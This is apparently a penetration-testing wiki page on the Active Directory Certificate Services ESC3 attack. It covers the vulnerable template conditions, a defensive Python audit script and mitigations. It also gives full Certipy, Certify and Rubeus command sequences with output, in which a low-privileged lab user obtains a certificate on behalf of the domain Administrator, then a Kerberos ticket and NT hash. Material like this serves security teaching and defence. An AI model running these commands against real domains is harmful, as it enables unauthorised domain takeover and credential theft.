Pentest Everything
ESC3

Description

ESC3 abuses certificate templates whose EKUs include "Certificate Request Agent". This EKU enables a principal to request a certificate on behalf of another user.

Requirements for attack path (1st condition)

  • Enrolment rights granted to a user or group we have access to

  • Manager approval not enabled

  • Authorized signatures are not required

  • The template EKU is set to either "Certificate Request Agent" or "Any Purpose"

Requirements for attack path (2nd condition)

Provided the above conditions are met on the template with the "Certificate Request Agent" EKU, the following second set of conditions needs to be met on a second template.

  • Enrolment rights granted to a user or group we have access to

  • Manager approval not enabled

  • The template defines an EKU that can be used for authentication, for example "Client Authentication"

  • The template schema version is 1, or it is greater than 2 and the template specifies an Application Policy Issuance Requirement that requires the Certificate Request Agent EKU.

  • No restrictions on enrollment agents are implemented at the CA level.

A likely candidate for the 2nd condition template is the default "User" template.
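Before applying the mitigations, a defender can audit exported template attributes against the two condition sets above. This is an added example in Python, not code from the original page or from Certipy/Certify; the template records are constructed, and enrollable_by_low_priv is assumed to have been resolved from the template enrollment ACEs beforehand.

```python
# Added audit example, not from the original page nor the Certipy/Certify projects: it applies
# the two ESC3 condition sets above to template attributes a defender exports from AD's
# Certificate Templates container; enrollable_by_low_priv is assumed pre-resolved from ACEs.
OID_CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"   # Certificate Request Agent EKU
OID_ANY_PURPOSE = "2.5.29.37.0"                      # Any Purpose EKU
AUTH_EKUS = {"1.3.6.1.5.5.7.3.2",                    # Client Authentication
             "1.3.6.1.4.1.311.20.2.2",               # Smart Card Logon
             "1.3.6.1.5.2.3.4", OID_ANY_PURPOSE}     # PKINIT Client Authentication, Any Purpose
CT_FLAG_PEND_ALL_REQUESTS = 0x2                      # msPKI-Enrollment-Flag: manager approval

def is_agent_template(t):
    """1st condition set: low-priv enrollable, no manager approval, no signatures
    required, and an EKU of Certificate Request Agent or Any Purpose."""
    ekus = set(t["pKIExtendedKeyUsage"])
    return (t["enrollable_by_low_priv"]
            and not t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS
            and t["msPKI-RA-Signature"] == 0
            and bool(ekus & {OID_CERT_REQUEST_AGENT, OID_ANY_PURPOSE}))

def is_target_template(t):
    """2nd condition set: low-priv enrollable, no manager approval, an authentication EKU,
    and schema v1 or (v2+) one required signature with the Request Agent application policy."""
    ekus = set(t["pKIExtendedKeyUsage"])
    version = t["msPKI-Template-Schema-Version"]
    issuance_ok = version == 1 or (
        version >= 2 and t["msPKI-RA-Signature"] == 1
        and OID_CERT_REQUEST_AGENT in t.get("msPKI-RA-Application-Policies", []))
    return (t["enrollable_by_low_priv"]
            and not t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS
            and bool(ekus & AUTH_EKUS) and issuance_ok)

def find_esc3_paths(templates, ca_restricts_enrollment_agents):
    """(agent, target) template name pairs that form an ESC3 path; CA-level enrollment
    agent restrictions (the last bullet above) break every pair."""
    if ca_restricts_enrollment_agents:
        return []
    agents = [t["name"] for t in templates if is_agent_template(t)]
    targets = [t["name"] for t in templates if is_target_template(t)]
    return [(a, b) for a in agents for b in targets]

def tmpl(name, flag, sigs, version, ekus, enrollable=True):
    """Build a template record in the attribute shape the checks above expect."""
    return {"name": name, "enrollable_by_low_priv": enrollable, "msPKI-Enrollment-Flag": flag,
            "msPKI-RA-Signature": sigs, "msPKI-Template-Schema-Version": version,
            "pKIExtendedKeyUsage": ekus}

SAMPLE_TEMPLATES = [  # constructed sample data, not taken from any real environment
    tmpl("ESC3", 0, 0, 2, [OID_CERT_REQUEST_AGENT]),               # agent template, open
    tmpl("AgentApproved", 0x2, 0, 2, [OID_CERT_REQUEST_AGENT]),    # manager approval: safe
    tmpl("User", 0, 0, 1, ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"]),  # v1, Client Auth
    tmpl("WebServer", 0, 0, 1, ["1.3.6.1.5.5.7.3.1"]),             # Server Auth only: no
]
```

Any pair returned by find_esc3_paths is a template combination to fix with the mitigations listed at the end of the page; an empty list for real exported data means the two condition sets are not both satisfied.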

Linux - Enumeration

certipy find -u 'moe@security.local' -p 'Password123' -dc-ip 10.10.10.100 -enabled -stdout -vulnerable

Linux - Performing the attack

Perform the initial request against the identified template configured with the EKU "Certificate Request Agent".

certipy req -u 'moe@security.local' -p 'Password123' -dc-ip 10.10.10.100 -ca 'SECURITY-CA-CA' -target-ip 10.10.10.2 -template 'ESC3' -out cert
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.10.2[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.10.2[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with UPN 'Moe@SECURITY.LOCAL'
[*] Certificate object SID is 'S-1-5-21-13999771-2333344039-1820745628-1105'
[*] Saved certificate and private key to 'cert.pfx'

We can request a certificate on behalf of any user using any other template by including the initial certificate as proof. For authentication purposes, it is essential to request a certificate from a template that includes Client Authentication in its Extended Key Usage (EKU) settings.

For accuracy and to avoid certificate mismatch issues, we should always aim to provide the -sid parameter, which should be the object SID of the account we are targeting (administrator@security.local in the example below).

certipy req -u 'moe@security.local' -p 'Password123' -dc-ip 10.10.10.100 -ca 'SECURITY-CA-CA' -target-ip 10.10.10.2 -template 'user' -on-behalf-of 'security\administrator' -sid S-1-5-21-13999771-2333344039-1820745628-500 -pfx cert.pfx
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 18
[*] Got certificate with UPN 'administrator@SECURITY.LOCAL'
[*] Certificate object SID is 'S-1-5-21-13999771-2333344039-1820745628-500'
[*] Saved certificate and private key to 'administrator.pfx'

Finally, use the certificate file to obtain the user credentials.

certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'security.local' -dc-ip 10.10.10.100
[*] Using principal: administrator@security.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@security.local': aad3b435b51404eeaad3b435b51404ee:2b576acbe6bc

Windows - Enumeration

.\Certify.exe find /vulnerable

Identify certificates that can be used for client authentication

.\Certify.exe find /enabled /clientauth

Windows - Performing the attack

Request a certificate for the template vulnerable to ESC3.

.\Certify.exe request /ca:CA.SECURITY.LOCAL\SECURITY-CA-CA /template:ESC3-P1

Take the private key and certificate output and place them into separate files.

cert.key
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAzyqzlf9NI2sbkAAiJ
-----END RSA PRIVATE KEY-----
cert.pem
-----BEGIN CERTIFICATE-----
MIIGeDCCBWCgAwIBAgITIwAAAFhhlVOMQ7
-----END CERTIFICATE-----

Then merge them together with certutil to create a .pfx file.

certutil -MergePFX .\cert.pem .\cert.pfx

We can request a certificate on behalf of any user using any other template by including the initial certificate as proof. For authentication purposes, it is essential to request a certificate from a template that includes Client Authentication in its Extended Key Usage (EKU) settings.

For accuracy and to avoid certificate mismatch issues, we should always aim to provide the /sid parameter, which should be the object SID of the account we are targeting (administrator@security.local in the example below).

.\Certify.exe request /ca:CA.SECURITY.LOCAL\SECURITY-CA-CA /template:User /onbehalfof:security\Administrator /sid:S-1-5-21-13999771-2333344039-1820745628-500 /enrollcert:cert.pfx

Again, take the new key and certificate output and place them into separate files.

admin.key
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAzyqzlf9NI2sbkAAiJ
-----END RSA PRIVATE KEY-----
admin.pem
-----BEGIN CERTIFICATE-----
MIIGeDCCBWCgAwIBAgITIwAAAFhhlVOMQ7
-----END CERTIFICATE-----

Then merge them together with certutil to create a .pfx file.

certutil -MergePFX .\admin.pem .\admin.pfx
# Get NTLM Hash
.\Rubeus.exe asktgt /user:security\Administrator /certificate:admin.pfx /getcredentials

# Get TGT
.\Rubeus.exe asktgt /user:security\Administrator /certificate:admin.pfx /nowrap
< -- Snip -->

  ServiceName              :  krbtgt/security
  ServiceRealm             :  SECURITY.LOCAL
  UserName                 :  Administrator (NT_PRINCIPAL)
  UserRealm                :  SECURITY.LOCAL
  StartTime                :  04/03/2025 19:25:09
  EndTime                  :  05/03/2025 05:25:09
  RenewTill                :  11/03/2025 19:25:09
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  30AP07EilJ/mM6LsDioVPw==
  ASREP (key)              :  C2E0C2C00D58B05671F7DA68F4D72796

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : 2B576ACBE6BCFDA7294D6BD18041B8FE

Mitigations

  • Require manager approval on the certificate template

  • Require authorized signatures

  • Remove weak enrollment permissions from the template

  • Replace "Any Purpose" (if configured) with a more restrictive EKU

  • Use Enrollment Agent restrictions on the Certificate Authority level. For example, you might want to restrict which users are allowed to act as an Enrollment Agent, and which templates can be requested.

Last updated 2 months ago